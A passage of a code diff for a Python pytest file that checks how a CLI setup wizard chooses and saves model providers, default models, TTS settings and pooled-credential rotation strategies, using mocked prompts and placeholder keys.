_clear_provider_env(monkeypatch)
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-test-key")
|
||||
|
||||
config = load_config()
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
def fake_select():
|
||||
_write_model_config(tmp_path, "openai-codex", "https://api.openai.com/v1", "gpt-4o")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "openai-codex"
|
||||
assert reloaded["model"]["default"] == "gpt-5.2-codex"
|
||||
assert reloaded["model"]["base_url"] == "https://chatgpt.com/backend-api/codex"
|
||||
|
||||
|
||||
def test_nous_setup_sets_managed_openai_tts_when_unconfigured(tmp_path, monkeypatch, capsys):
|
||||
monkeypatch.setenv("HERMES_ENABLE_NOUS_MANAGED_TOOLS", "1")
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 1
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
return len(choices) - 1
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
|
||||
def _fake_login_nous(*args, **kwargs):
|
||||
auth_path = tmp_path / "auth.json"
|
||||
auth_path.write_text(json.dumps({"active_provider": "nous", "providers": {"nous": {"access_token": "nous-token"}}}))
|
||||
_update_config_for_provider("nous", "https://inference.example.com/v1")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.auth._login_nous", _fake_login_nous)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_nous_runtime_credentials",
|
||||
lambda *args, **kwargs: {
|
||||
"base_url": "https://inference.example.com/v1",
|
||||
"api_key": "nous-key",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.fetch_nous_models",
|
||||
lambda *args, **kwargs: ["gemini-3-flash"],
|
||||
)
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert config["tts"]["provider"] == "openai"
|
||||
assert "Nous subscription enables managed web tools" in out
|
||||
assert "OpenAI TTS via your Nous subscription" in out
|
||||
|
||||
|
||||
def test_nous_setup_preserves_existing_tts_provider(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
config["tts"] = {"provider": "elevenlabs"}
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 1
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
return len(choices) - 1
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth._login_nous",
|
||||
lambda *args, **kwargs: (tmp_path / "auth.json").write_text(
|
||||
json.dumps({"active_provider": "nous", "providers": {"nous": {"access_token": "nous-token"}}})
|
||||
),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_nous_runtime_credentials",
|
||||
lambda *args, **kwargs: {
|
||||
"base_url": "https://inference.example.com/v1",
|
||||
"api_key": "nous-key",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.fetch_nous_models",
|
||||
lambda *args, **kwargs: ["gemini-3-flash"],
|
||||
)
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
assert config["tts"]["provider"] == "elevenlabs"
|
||||
|
||||
|
||||
def test_modal_setup_can_use_nous_subscription_without_modal_creds(tmp_path, monkeypatch, capsys):
|
||||
|
|
|
|||
|
|
@ -1,4 +1,9 @@
|
|||
"""Regression tests for interactive setup provider/model persistence."""
|
||||
"""Regression tests for interactive setup provider/model persistence.
|
||||
|
||||
Since setup_model_provider delegates to select_provider_and_model()
|
||||
from hermes_cli.main, these tests mock the delegation point and verify
|
||||
that the setup wizard correctly syncs config from disk after the call.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
|
|
@ -14,19 +19,6 @@ def _maybe_keep_current_tts(question, choices):
|
|||
return len(choices) - 1
|
||||
|
||||
|
||||
def _read_env(home):
|
||||
env_path = home / ".env"
|
||||
data = {}
|
||||
if not env_path.exists():
|
||||
return data
|
||||
for line in env_path.read_text().splitlines():
|
||||
if not line or line.startswith("#") or "=" not in line:
|
||||
continue
|
||||
k, v = line.split("=", 1)
|
||||
data[k] = v
|
||||
return data
|
||||
|
||||
|
||||
def _clear_provider_env(monkeypatch):
|
||||
for key in (
|
||||
"HERMES_INFERENCE_PROVIDER",
|
||||
|
|
@ -45,419 +37,375 @@ def _clear_provider_env(monkeypatch):
|
|||
monkeypatch.delenv(key, raising=False)
|
||||
|
||||
|
||||
def _stub_tts(monkeypatch):
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", lambda q, c, d=0: (
|
||||
_maybe_keep_current_tts(q, c) if _maybe_keep_current_tts(q, c) is not None
|
||||
else d
|
||||
))
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *a, **kw: False)
|
||||
|
||||
|
||||
def _write_model_config(provider, base_url="", model_name="test-model"):
|
||||
"""Simulate what a _model_flow_* function writes to disk."""
|
||||
cfg = load_config()
|
||||
m = cfg.get("model")
|
||||
if not isinstance(m, dict):
|
||||
m = {"default": m} if m else {}
|
||||
cfg["model"] = m
|
||||
m["provider"] = provider
|
||||
if base_url:
|
||||
m["base_url"] = base_url
|
||||
else:
|
||||
m.pop("base_url", None)
|
||||
if model_name:
|
||||
m["default"] = model_name
|
||||
m.pop("api_mode", None)
|
||||
save_config(cfg)
|
||||
|
||||
|
||||
def test_setup_keep_current_custom_from_config_does_not_fall_through(tmp_path, monkeypatch):
|
||||
"""Keep-current custom should not fall through to the generic model menu."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
save_env_value("OPENAI_BASE_URL", "https://example.invalid/v1")
|
||||
save_env_value("OPENAI_API_KEY", "custom-key")
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
# Pre-set custom provider
|
||||
_write_model_config("custom", "http://localhost:8080/v1", "local-model")
|
||||
|
||||
config = load_config()
|
||||
config["model"] = {
|
||||
"default": "custom/model",
|
||||
"provider": "custom",
|
||||
"base_url": "https://example.invalid/v1",
|
||||
}
|
||||
save_config(config)
|
||||
assert config["model"]["provider"] == "custom"
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
assert choices[-1] == "Keep current (Custom: https://example.invalid/v1)"
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError("Model menu should not appear for keep-current custom")
|
||||
def fake_select():
|
||||
pass # user chose "cancel" or "keep current"
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "custom"
|
||||
assert reloaded["model"]["default"] == "custom/model"
|
||||
assert reloaded["model"]["base_url"] == "https://example.invalid/v1"
|
||||
assert reloaded["model"]["base_url"] == "http://localhost:8080/v1"
|
||||
|
||||
|
||||
def test_setup_custom_endpoint_saves_working_v1_base_url(tmp_path, monkeypatch):
|
||||
def test_setup_keep_current_config_provider_uses_provider_specific_model_menu(
|
||||
tmp_path, monkeypatch
|
||||
):
|
||||
"""Keeping current provider preserves the config on disk."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
_write_model_config("zai", "https://open.bigmodel.cn/api/paas/v4", "glm-5")
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 3 # Custom endpoint
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1 # Skip
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
def fake_select():
|
||||
pass # keep current
|
||||
|
||||
# _model_flow_custom uses builtins.input (URL, key, model, context_length)
|
||||
input_values = iter([
|
||||
"http://localhost:8000",
|
||||
"local-key",
|
||||
"llm",
|
||||
"", # context_length (blank = auto-detect)
|
||||
])
|
||||
monkeypatch.setattr("builtins.input", lambda _prompt="": next(input_values))
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.main._save_custom_provider", lambda *args, **kwargs: None)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.models.probe_api_models",
|
||||
lambda api_key, base_url: {
|
||||
"models": ["llm"],
|
||||
"probed_url": "http://localhost:8000/v1/models",
|
||||
"resolved_base_url": "http://localhost:8000/v1",
|
||||
"suggested_base_url": "http://localhost:8000/v1",
|
||||
"used_fallback": True,
|
||||
},
|
||||
)
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
env = _read_env(tmp_path)
|
||||
|
||||
# _model_flow_custom saves env vars and config to disk
|
||||
assert env.get("OPENAI_BASE_URL") == "http://localhost:8000/v1"
|
||||
assert env.get("OPENAI_API_KEY") == "local-key"
|
||||
|
||||
# The model config is saved as a dict by _model_flow_custom
|
||||
reloaded = load_config()
|
||||
model_cfg = reloaded.get("model", {})
|
||||
if isinstance(model_cfg, dict):
|
||||
assert model_cfg.get("provider") == "custom"
|
||||
assert model_cfg.get("default") == "llm"
|
||||
|
||||
|
||||
def test_setup_keep_current_config_provider_uses_provider_specific_model_menu(tmp_path, monkeypatch):
|
||||
"""Keep-current should respect config-backed providers, not fall back to OpenRouter."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
config["model"] = {
|
||||
"default": "claude-opus-4-6",
|
||||
"provider": "anthropic",
|
||||
}
|
||||
save_config(config)
|
||||
|
||||
captured = {"provider_choices": None, "model_choices": None}
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
captured["provider_choices"] = list(choices)
|
||||
assert choices[-1] == "Keep current (Anthropic)"
|
||||
return len(choices) - 1
|
||||
if question == "Configure vision:":
|
||||
assert question == "Configure vision:"
|
||||
assert choices[-1] == "Skip for now"
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
captured["model_choices"] = list(choices)
|
||||
return len(choices) - 1 # keep current model
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.models.provider_model_ids", lambda provider: [])
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
assert captured["provider_choices"] is not None
|
||||
assert captured["model_choices"] is not None
|
||||
assert captured["model_choices"][0] == "claude-opus-4-6"
|
||||
assert "anthropic/claude-opus-4.6 (recommended)" not in captured["model_choices"]
|
||||
|
||||
|
||||
def test_setup_keep_current_anthropic_can_configure_openai_vision_default(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
config["model"] = {
|
||||
"default": "claude-opus-4-6",
|
||||
"provider": "anthropic",
|
||||
}
|
||||
save_config(config)
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
assert choices[-1] == "Keep current (Anthropic)"
|
||||
return len(choices) - 1
|
||||
if question == "Configure vision:":
|
||||
return 1
|
||||
if question == "Select vision model:":
|
||||
assert choices[-1] == "Use default (gpt-4o-mini)"
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
assert choices[-1] == "Keep current (claude-opus-4-6)"
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.setup.prompt",
|
||||
lambda message, *args, **kwargs: "sk-openai" if "OpenAI API key" in message else "",
|
||||
)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.models.provider_model_ids", lambda provider: [])
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
env = _read_env(tmp_path)
|
||||
|
||||
assert env.get("OPENAI_API_KEY") == "sk-openai"
|
||||
assert env.get("OPENAI_BASE_URL") == "https://api.openai.com/v1"
|
||||
assert env.get("AUXILIARY_VISION_MODEL") == "gpt-4o-mini"
|
||||
|
||||
|
||||
def test_setup_copilot_uses_gh_auth_and_saves_provider(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
assert choices[14] == "GitHub Copilot (uses GITHUB_TOKEN or gh auth token)"
|
||||
return 14
|
||||
if question == "Select default model:":
|
||||
assert "gpt-4.1" in choices
|
||||
assert "gpt-5.4" in choices
|
||||
return choices.index("gpt-5.4")
|
||||
if question == "Select reasoning effort:":
|
||||
assert "low" in choices
|
||||
assert "high" in choices
|
||||
return choices.index("high")
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
def fake_prompt(message, *args, **kwargs):
|
||||
raise AssertionError(f"Unexpected prompt call: {message}")
|
||||
|
||||
def fake_get_auth_status(provider_id):
|
||||
if provider_id == "copilot":
|
||||
return {"logged_in": True}
|
||||
return {"logged_in": False}
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", fake_prompt)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.auth.get_auth_status", fake_get_auth_status)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_api_key_provider_credentials",
|
||||
lambda provider_id: {
|
||||
"provider": provider_id,
|
||||
"api_key": "gh-cli-token",
|
||||
"base_url": "https://api.githubcopilot.com",
|
||||
"source": "gh auth token",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.models.fetch_github_model_catalog",
|
||||
lambda api_key: [
|
||||
{
|
||||
"id": "gpt-4.1",
|
||||
"capabilities": {"type": "chat", "supports": {}},
|
||||
"supported_endpoints": ["/chat/completions"],
|
||||
},
|
||||
{
|
||||
"id": "gpt-5.4",
|
||||
"capabilities": {"type": "chat", "supports": {"reasoning_effort": ["low", "medium", "high"]}},
|
||||
"supported_endpoints": ["/responses"],
|
||||
},
|
||||
],
|
||||
)
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
env = _read_env(tmp_path)
|
||||
reloaded = load_config()
|
||||
|
||||
assert env.get("GITHUB_TOKEN") is None
|
||||
assert reloaded["model"]["provider"] == "copilot"
|
||||
assert reloaded["model"]["base_url"] == "https://api.githubcopilot.com"
|
||||
assert reloaded["model"]["default"] == "gpt-5.4"
|
||||
assert reloaded["model"]["api_mode"] == "codex_responses"
|
||||
assert reloaded["agent"]["reasoning_effort"] == "high"
|
||||
|
||||
|
||||
def test_setup_copilot_acp_uses_model_picker_and_saves_provider(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
assert choices[15] == "GitHub Copilot ACP (spawns `copilot --acp --stdio`)"
|
||||
return 15
|
||||
if question == "Select default model:":
|
||||
assert "gpt-4.1" in choices
|
||||
assert "gpt-5.4" in choices
|
||||
return choices.index("gpt-5.4")
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
def fake_prompt(message, *args, **kwargs):
|
||||
raise AssertionError(f"Unexpected prompt call: {message}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", fake_prompt)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.auth.get_auth_status", lambda provider_id: {"logged_in": provider_id == "copilot-acp"})
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_api_key_provider_credentials",
|
||||
lambda provider_id: {
|
||||
"provider": "copilot",
|
||||
"api_key": "gh-cli-token",
|
||||
"base_url": "https://api.githubcopilot.com",
|
||||
"source": "gh auth token",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.models.fetch_github_model_catalog",
|
||||
lambda api_key: [
|
||||
{
|
||||
"id": "gpt-4.1",
|
||||
"capabilities": {"type": "chat", "supports": {}},
|
||||
"supported_endpoints": ["/chat/completions"],
|
||||
},
|
||||
{
|
||||
"id": "gpt-5.4",
|
||||
"capabilities": {"type": "chat", "supports": {"reasoning_effort": ["low", "medium", "high"]}},
|
||||
"supported_endpoints": ["/responses"],
|
||||
},
|
||||
],
|
||||
)
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
|
||||
assert reloaded["model"]["provider"] == "copilot-acp"
|
||||
assert reloaded["model"]["base_url"] == "acp://copilot"
|
||||
assert reloaded["model"]["default"] == "gpt-5.4"
|
||||
assert reloaded["model"]["api_mode"] == "chat_completions"
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "zai"
|
||||
|
||||
|
||||
def test_setup_switch_custom_to_codex_clears_custom_endpoint_and_updates_config(tmp_path, monkeypatch):
|
||||
"""Switching from custom to Codex should clear custom endpoint overrides."""
|
||||
def test_setup_same_provider_rotation_strategy_saved_for_multi_credential_pool(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
save_env_value("OPENROUTER_API_KEY", "or-key")
|
||||
|
||||
save_env_value("OPENAI_BASE_URL", "https://example.invalid/v1")
|
||||
save_env_value("OPENAI_API_KEY", "sk-custom")
|
||||
save_env_value("OPENROUTER_API_KEY", "sk-or")
|
||||
# Pre-write config so the pool step sees provider="openrouter"
|
||||
_write_model_config("openrouter", "", "anthropic/claude-opus-4.6")
|
||||
|
||||
config = load_config()
|
||||
config["model"] = {
|
||||
"default": "custom/model",
|
||||
"provider": "custom",
|
||||
"base_url": "https://example.invalid/v1",
|
||||
}
|
||||
save_config(config)
|
||||
|
||||
class _Entry:
|
||||
def __init__(self, label):
|
||||
self.label = label
|
||||
|
||||
class _Pool:
|
||||
def entries(self):
|
||||
return [_Entry("primary"), _Entry("secondary")]
|
||||
|
||||
def fake_select():
|
||||
pass # no-op — config already has provider set
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 2 # OpenAI Codex
|
||||
if question == "Select default model:":
|
||||
if "rotation strategy" in question:
|
||||
return 1 # round robin
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
return default
|
||||
|
||||
def fake_prompt_yes_no(question, default=True):
|
||||
return False
|
||||
|
||||
# Patch directly on the module objects to ensure local imports pick them up.
|
||||
import hermes_cli.main as _main_mod
|
||||
import hermes_cli.setup as _setup_mod
|
||||
import agent.credential_pool as _pool_mod
|
||||
import agent.auxiliary_client as _aux_mod
|
||||
|
||||
monkeypatch.setattr(_main_mod, "select_provider_and_model", fake_select)
|
||||
# NOTE: _stub_tts overwrites prompt_choice, so set our mock AFTER it.
|
||||
_stub_tts(monkeypatch)
|
||||
monkeypatch.setattr(_setup_mod, "prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr(_setup_mod, "prompt_yes_no", fake_prompt_yes_no)
|
||||
monkeypatch.setattr(_setup_mod, "prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr(_pool_mod, "load_pool", lambda provider: _Pool())
|
||||
monkeypatch.setattr(_aux_mod, "get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
# The pool has 2 entries, so the strategy prompt should fire
|
||||
strategy = config.get("credential_pool_strategies", {}).get("openrouter")
|
||||
assert strategy == "round_robin", f"Expected round_robin but got {strategy}"
|
||||
|
||||
|
||||
def test_setup_same_provider_fallback_can_add_another_credential(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
save_env_value("OPENROUTER_API_KEY", "or-key")
|
||||
|
||||
# Pre-write config so the pool step sees provider="openrouter"
|
||||
_write_model_config("openrouter", "", "anthropic/claude-opus-4.6")
|
||||
|
||||
config = load_config()
|
||||
pool_sizes = iter([1, 2])
|
||||
add_calls = []
|
||||
|
||||
class _Entry:
|
||||
def __init__(self, label):
|
||||
self.label = label
|
||||
|
||||
class _Pool:
|
||||
def __init__(self, size):
|
||||
self._size = size
|
||||
|
||||
def entries(self):
|
||||
return [_Entry(f"cred-{idx}") for idx in range(self._size)]
|
||||
|
||||
def fake_load_pool(provider):
|
||||
return _Pool(next(pool_sizes))
|
||||
|
||||
def fake_auth_add_command(args):
|
||||
add_calls.append(args.provider)
|
||||
|
||||
def fake_select():
|
||||
pass # no-op — config already has provider set
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select same-provider rotation strategy:":
|
||||
return 0
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
return default
|
||||
|
||||
yes_no_answers = iter([True, False])
|
||||
|
||||
def fake_prompt_yes_no(question, default=True):
|
||||
if question == "Add another credential for same-provider fallback?":
|
||||
return next(yes_no_answers)
|
||||
return False
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
_stub_tts(monkeypatch)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", fake_prompt_yes_no)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("agent.credential_pool.load_pool", fake_load_pool)
|
||||
monkeypatch.setattr("hermes_cli.auth_commands.auth_add_command", fake_auth_add_command)
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
assert add_calls == ["openrouter"]
|
||||
assert config.get("credential_pool_strategies", {}).get("openrouter") == "fill_first"
|
||||
|
||||
|
||||
def test_setup_pool_step_shows_manual_vs_auto_detected_counts(tmp_path, monkeypatch, capsys):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
save_env_value("OPENROUTER_API_KEY", "or-key")
|
||||
|
||||
# Pre-write config so the pool step sees provider="openrouter"
|
||||
_write_model_config("openrouter", "", "anthropic/claude-opus-4.6")
|
||||
|
||||
config = load_config()
|
||||
|
||||
class _Entry:
|
||||
def __init__(self, label, source):
|
||||
self.label = label
|
||||
self.source = source
|
||||
|
||||
class _Pool:
|
||||
def entries(self):
|
||||
return [
|
||||
_Entry("primary", "manual"),
|
||||
_Entry("secondary", "manual"),
|
||||
_Entry("OPENROUTER_API_KEY", "env:OPENROUTER_API_KEY"),
|
||||
]
|
||||
|
||||
def fake_select():
|
||||
pass # no-op — config already has provider set
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if "rotation strategy" in question:
|
||||
return 0
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
return default
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
_stub_tts(monkeypatch)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("agent.credential_pool.load_pool", lambda provider: _Pool())
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Current pooled credentials for openrouter: 3 (2 manual, 1 auto-detected from env/shared auth)" in out
|
||||
|
||||
|
||||
def test_setup_copilot_acp_skips_same_provider_pool_step(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 15 # GitHub Copilot ACP
|
||||
if question == "Select default model:":
|
||||
return 0
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
def fake_prompt_yes_no(question, default=True):
|
||||
if question == "Add another credential for same-provider fallback?":
|
||||
